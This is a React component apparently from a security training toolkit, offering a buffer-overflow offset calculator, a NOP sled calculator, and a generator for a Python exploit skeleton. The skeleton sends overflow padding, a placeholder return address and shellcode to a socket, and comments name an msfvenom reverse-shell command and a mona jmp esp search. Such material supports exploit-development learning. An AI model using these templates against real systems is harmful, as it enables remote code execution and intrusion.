import { useState } from "react";
import CyberpunkCard from "@/components/CyberpunkCard";
import { Button } from "@/components/ui/button";
import { Input } from "@/components/ui/input";
import { Copy, CheckCircle } from "lucide-react";

type Tab = "offset" | "payload" | "nop";

const BufferOverflowCalc = () => {
  const [activeTab, setActiveTab] = useState<Tab>("offset");
  const [copied, setCopied] = useState<string | null>(null);

  // Offset Calculator
  const [cyclicPattern, setCyclicPattern] = useState("");
  const [crashValue, setCrashValue] = useState("");
  const [offsetResult, setOffsetResult] = useState<number | null>(null);
  const [offsetError, setOffsetError] = useState<string | null>(null);

  // Payload Builder
  const [payloadOffset, setPayloadOffset] = useState("");
  const [badChars, setBadChars] = useState("\\x00");
  const [shellcodeSize, setShellcodeSize] = useState("350");
  const [payloadScript, setPayloadScript] = useState("");

  // NOP Sled
  const [nopShellcodeSize, setNopShellcodeSize] = useState("");
  const [bufferSize, setBufferSize] = useState("");
  const [nopResult, setNopResult] = useState<{ nopCount: number; totalPayload: number; recommendation: string } | null>(null);

  const copyToClipboard = (text: string, key: string) => {
    navigator.clipboard.writeText(text);
    setCopied(key);
    setTimeout(() => setCopied(null), 2000);
  };

  // Generate cyclic pattern
  const generateCyclicPattern = (length: number): string => {
    const chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    let result = "";
    let a = 0, b = 0, c = 0;
    while (result.length < length) {
      result += chars[a] + chars[b] + chars[c];
      c++;
      if (c >= chars.length) { c = 0; b++; }
      if (b >= chars.length) { b = 0; a++; }
      if (a >= chars.length) break;
    }
    return result.slice(0, length);
  };

  const calculateOffset = () => {
    setOffsetError(null);
    setOffsetResult(null);

    if (!cyclicPattern || !crashValue) {
      setOffsetError("Please provide both the cyclic pattern and crash value.");
      return;
    }

    const cleanCrash = crashValue.trim().replace(/^0x/i, "").replace(/\s+/g, "");

    // Try to find the crash value as a substring in the cyclic pattern
    let searchStr = "";
    try {
      // Convert hex bytes to ASCII
      if (/^[0-9a-fA-F]+$/.test(cleanCrash) && cleanCrash.length % 2 === 0) {
        for (let i = 0; i < cleanCrash.length; i += 2) {
          searchStr += String.fromCharCode(parseInt(cleanCrash.slice(i, i + 2), 16));
        }
      } else {
        searchStr = cleanCrash;
      }
    } catch {
      setOffsetError("Invalid crash value format. Use hex like 41424344 or 0x41424344.");
      return;
    }

    const idx = cyclicPattern.indexOf(searchStr);
    if (idx !== -1) {
      setOffsetResult(idx);
    } else {
      // Try little-endian
      const reversed = searchStr.split("").reverse().join("");
      const idxLE = cyclicPattern.indexOf(reversed);
      if (idxLE !== -1) {
        setOffsetResult(idxLE);
      } else {
        setOffsetError(`Pattern not found in cyclic string. Ensure the crash value is from this pattern.`);
      }
    }
  };

  const buildPayload = () => {
    const offset = parseInt(payloadOffset);
    if (isNaN(offset) || offset < 0) {
      return;
    }
    const sc = parseInt(shellcodeSize) || 350;
    const badCharsFormatted = badChars || "\\x00";

    const script = `#!/usr/bin/env python3
import socket, struct

# ============================================================
# Buffer Overflow Exploit Skeleton
# Generated by Cyber-X BufferOverflow Calculator
# ============================================================

TARGET_IP   = "127.0.0.1"
TARGET_PORT = 9999

OFFSET      = ${offset}
BAD_CHARS   = b"${badCharsFormatted.replace(/\\x/g, "\\x")}"

# Replace with your shellcode (approx ${sc} bytes)
# msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=4444 -b "${badCharsFormatted}" -f python
shellcode = b""
shellcode += b"\\xcc" * ${sc}   # TODO: replace with real shellcode

# Return address (overwrite EIP) - little endian
# Find with: !mona jmp -r esp -cpb "${badCharsFormatted}"
RET_ADDR = struct.pack("<I", 0xDEADBEEF)   # TODO: replace

NOP_SLED = b"\\x90" * 16

payload  = b"A" * OFFSET
payload += RET_ADDR
payload += NOP_SLED
payload += shellcode

print(f"[*] Payload length: {len(payload)}")
print(f"[*] Offset:         {OFFSET}")
print(f"[*] Return address: {RET_ADDR.hex()}")

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((TARGET_IP, TARGET_PORT))
    s.send(payload + b"\\r\\n")
    s.close()
    print("[+] Payload sent!")
except Exception as e:
    print(f"[-] Error: {e}")
`;
    setPayloadScript(script);
  };

  const calcNOP = () => {
    const sc = parseInt(nopShellcodeSize);
    const buf = parseInt(bufferSize);
    if (isNaN(sc) || isNaN(buf) || sc <= 0 || buf <= 0) {
      setNopResult(null);
      return;
    }
    const overhead = 16; // EIP overwrite + misc
    const available = buf - sc - overhead;
    const recommended = Math.max(16, Math.min(available, Math.floor(available * 0.5)));
    const total = recommended + sc + overhead;
    setNopResult({
      nopCount: recommended,
      totalPayload: total,
      recommendation: available > 0
        ? `NOP sled of ${recommended} bytes recommended (\\x90 * ${recommended})`
        : "Warning: Buffer may be too small for shellcode. Consider encoder or staged payload.",
    });
  };

  const tabClass = (t: Tab) =>
    `px-4 py-2 text-sm font-bold tracking-wide transition-colors ${
      activeTab === t
        ? "bg-cyber-red text-white"
        : "bg-cyber-cyan/10 text-cyber-cyan hover:bg-cyber-cyan/20 border border-cyber-cyan/30"
    } rounded`;

  return (
    <CyberpunkCard title="BUFFER OVERFLOW CALCULATOR">
      <div className="space-y-6">
        {/* Tabs */}
        <div className="flex gap-2 flex-wrap">
          <button className={tabClass("offset")} onClick={() => setActiveTab("offset")}>OFFSET CALCULATOR</button>
          <button className={tabClass("payload")} onClick={() => setActiveTab("payload")}>PAYLOAD BUILDER</button>
          <button className={tabClass("nop")} onClick={() => setActiveTab("nop")}>NOP SLED CALCULATOR</button>
        </div>

        {/* Offset Calculator */}
        {activeTab === "offset" && (
          <div className="space-y-4">
            <div className="glass-panel rounded p-4 space-y-3">
              <h3 className="text-cyber-cyan font-bold tracking-wide">OFFSET CALCULATOR</h3>
              <p className="text-gray-400 text-sm">Paste your cyclic pattern and the crash value (EIP/RIP contents) to calculate the exact offset.</p>

              <div>
                <label className="block text-sm text-cyber-cyan mb-1 tracking-wide">CYCLIC PATTERN</label>
                <textarea
                  className="w-full bg-black/50 border border-cyber-cyan/30 text-cyber-cyan rounded p-2 text-xs font-mono h-24 resize-none"
                  placeholder="Paste cyclic pattern here... (generate with: python3 -c \"import pwn; print(pwn.cyclic(500))\")"
                  value={cyclicPattern}
                  onChange={(e) => setCyclicPattern(e.target.value)}
                />
              </div>

              <div className="flex gap-2">
                <Button
                  className="text-xs bg-cyber-cyan/20 hover:bg-cyber-cyan/30 text-cyber-cyan border border-cyber-cyan/30"
                  size="sm"
                  onClick={() => {
                    const p = generateCyclicPattern(500);
                    setCyclicPattern(p);
                    copyToClipboard(p, "cyclic");
                  }}
                >
                  {copied === "cyclic" ? <><CheckCircle className="w-3 h-3 mr-1" />Copied!</> : "Generate 500-byte Pattern"}
                </Button>
              </div>

              <div>
                <label className="block text-sm text-cyber-cyan mb-1 tracking-wide">CRASH VALUE (EIP)</label>
                <Input
                  value={crashValue}
                  onChange={(e) => setCrashValue(e.target.value)}
                  placeholder="e.g. 41424344 or 0x41424344"
                  className="bg-black/50 border-cyber-cyan/30 text-cyber-cyan font-mono"
                />
              </div>

              <Button
                className="bg-cyber-red hover:bg-cyber-red/80 text-white font-bold"
                onClick={calculateOffset}
              >
                CALCULATE OFFSET
              </Button>

              {offsetError && (
                <div className="flex items-center gap-2 p-3 bg-red-500/10 border border-red-500/30 rounded text-red-400 text-sm">
                  {offsetError}
                </div>
              )}

              {offsetResult !== null && (
                <div className="p-4 bg-green-500/10 border border-green-500/30 rounded">
                  <p className="text-green-400 font-bold text-lg">Offset: <span className="font-mono">{offsetResult}</span> bytes</p>
                  <p className="text-gray-400 text-sm mt-1">Use <span className="font-mono text-cyber-cyan">b"A" * {offsetResult}</span> before your return address.</p>
                </div>
              )}
            </div>
          </div>
        )}

        {/* Payload Builder */}
        {activeTab === "payload" && (
          <div className="space-y-4">
            <div className="glass-panel rounded p-4 space-y-3">
              <h3 className="text-cyber-cyan font-bold tracking-wide">PYTHON PAYLOAD SKELETON BUILDER</h3>
              <p className="text-gray-400 text-sm">Fill in the parameters below to generate a Python exploit skeleton.</p>

              <div className="grid grid-cols-1 md:grid-cols-3 gap-3">
                <div>
                  <label className="block text-sm text-cyber-cyan mb-1 tracking-wide">OFFSET (bytes)</label>
                  <Input
                    value={payloadOffset}
                    onChange={(e) => setPayloadOffset(e.target.value)}
                    placeholder="e.g. 146"
                    className="bg-black/50 border-cyber-cyan/30 text-cyber-cyan font-mono"
                  />
                </div>
                <div>
                  <label className="block text-sm text-cyber-cyan mb-1 tracking-wide">BAD CHARS</label>
                  <Input
                    value={badChars}
                    onChange={(e) => setBadChars(e.target.value)}
                    placeholder="\x00\x0a"
                    className="bg-black/50 border-cyber-cyan/30 text-cyber-cyan font-mono"
                  />
                </div>
                <div>
                  <label className="block text-sm text-cyber-cyan mb-1 tracking-wide">SHELLCODE SIZE (bytes)</label>
                  <Input
                    value={shellcodeSize}
                    onChange={(e) => setShellcodeSize(e.target.value)}
                    placeholder="350"
                    className="bg-black/50 border-cyber-cyan/30 text-cyber-cyan font-mono"
                  />
                </div>
              </div>

              <Button
                className="bg-cyber-red hover:bg-cyber-red/80 text-white font-bold"
                onClick={buildPayload}
                disabled={!payloadOffset}
              >
                GENERATE PAYLOAD SKELETON
              </Button>
            </div>

            {payloadScript && (
              <div className="glass-panel rounded p-4">
                <div className="flex items-center justify-between mb-2">
                  <h3 className="text-cyber-cyan font-bold tracking-wide">GENERATED SCRIPT</h3>
                  <Button
                    size="sm"
                    className="bg-cyber-cyan/20 hover:bg-cyber-cyan/30 text-cyber-cyan border border-cyber-cyan/30"
                    onClick={() => copyToClipboard(payloadScript, "script")}
                  >
                    {copied === "script" ? <><CheckCircle className="w-3 h-3 mr-1" />Copied!</> : <><Copy className="w-3 h-3 mr-1" />Copy</>}
                  </Button>
                </div>
                <pre className="text-xs text-cyber-cyan font-mono bg-black/50 rounded p-3 overflow-x-auto whitespace-pre">{payloadScript}</pre>
              </div>
            )}
          </div>
        )}

        {/* NOP Sled */}
        {activeTab === "nop" && (
          <div className="space-y-4">
            <div className="glass-panel rounded p-4 space-y-3">
              <h3 className="text-cyber-cyan font-bold tracking-wide">NOP SLED CALCULATOR</h3>
              <p className="text-gray-400 text-sm">Calculate the recommended NOP sled size based on shellcode and buffer sizes.</p>

              <div className="grid grid-cols-1 md:grid-cols-2 gap-3">
                <div>
                  <label className="block text-sm text-cyber-cyan mb-1 tracking-wide">SHELLCODE SIZE (bytes)</label>
                  <Input
                    value={nopShellcodeSize}
                    onChange={(e) => setNopShellcodeSize(e.target.value)}
                    placeholder="e.g. 350"
                    className="bg-black/50 border-cyber-cyan/30 text-cyber-cyan font-mono"
                  />
                </div>
                <div>
                  <label className="block text-sm text-cyber-cyan mb-1 tracking-wide">TOTAL BUFFER SIZE (bytes)</label>
                  <Input
                    value={bufferSize}
                    onChange={(e) => setBufferSize(e.target.value)}
                    placeholder="e.g. 1024"
                    className="bg-black/50 border-cyber-cyan/30 text-cyber-cyan font-mono"
                  />
                </div>
              </div>

              <Button
                className="bg-cyber-red hover:bg-cyber-red/80 text-white font-bold"
                onClick={calcNOP}
                disabled={!nopShellcodeSize || !bufferSize}
              >
                CALCULATE NOP SLED
              </Button>

              {nopResult && (
                <div className="space-y-3">
                  <div className="grid grid-cols-2 gap-3">
                    <div className="p-3 bg-cyber-cyan/10 border border-cyber-cyan/30 rounded text-center">
                      <p className="text-2xl font-bold text-cyber-cyan font-mono">{nopResult.nopCount}</p>
                      <p className="text-xs text-gray-400">Recommended NOP Count</p>
                    </div>
                    <div className="p-3 bg-cyber-cyan/10 border border-cyber-cyan/30 rounded text-center">
                      <p className="text-2xl font-bold text-cyber-cyan font-mono">{nopResult.totalPayload}</p>
                      <p className="text-xs text-gray-400">Total Payload Size</p>
                    </div>
                  </div>
                  <div className="p-3 bg-green-500/10 border border-green-500/30 rounded">
                    <p className="text-green-400 text-sm">{nopResult.recommendation}</p>
                  </div>
                  <div className="p-3 bg-black/50 border border-cyber-cyan/20 rounded">
                    <p className="text-xs text-gray-400 mb-1">Python snippet:</p>
                    <div className="flex items-center gap-2">
                      <code className="text-cyber-cyan font-mono text-sm flex-1">
                        nop_sled = b"\x90" * {nopResult.nopCount}
                      </code>
                      <Button
                        size="sm"
                        className="bg-cyber-cyan/20 hover:bg-cyber-cyan/30 text-cyber-cyan border border-cyber-cyan/30"
                        onClick={() => copyToClipboard(`nop_sled = b"\\x90" * ${nopResult!.nopCount}`, "nop")}
                      >
                        {copied === "nop" ? <CheckCircle className="w-3 h-3" /> : <Copy className="w-3 h-3" />}
                      </Button>
                    </div>
                  </div>
                </div>
              )}
            </div>

            <div className="glass-panel rounded p-4">
              <h3 className="text-cyber-cyan font-bold tracking-wide mb-3">NOP SLED REFERENCE</h3>
              <div className="space-y-2 text-sm text-gray-400">
                <p>• NOP sled (<code className="text-cyber-cyan">\x90</code>) increases landing zone for shellcode</p>
                <p>• Typical sled: 16–256 bytes before shellcode</p>
                <p>• Layout: <code className="text-cyber-cyan">PADDING + RET_ADDR + NOP_SLED + SHELLCODE</code></p>
                <p>• Larger sleds increase reliability but reduce shellcode space</p>
                <p>• For ASLR bypass, consider a longer sled (512+ bytes) with spray technique</p>
              </div>
            </div>
          </div>
        )}
      </div>
    </CyberpunkCard>
  );
};

export default BufferOverflowCalc;
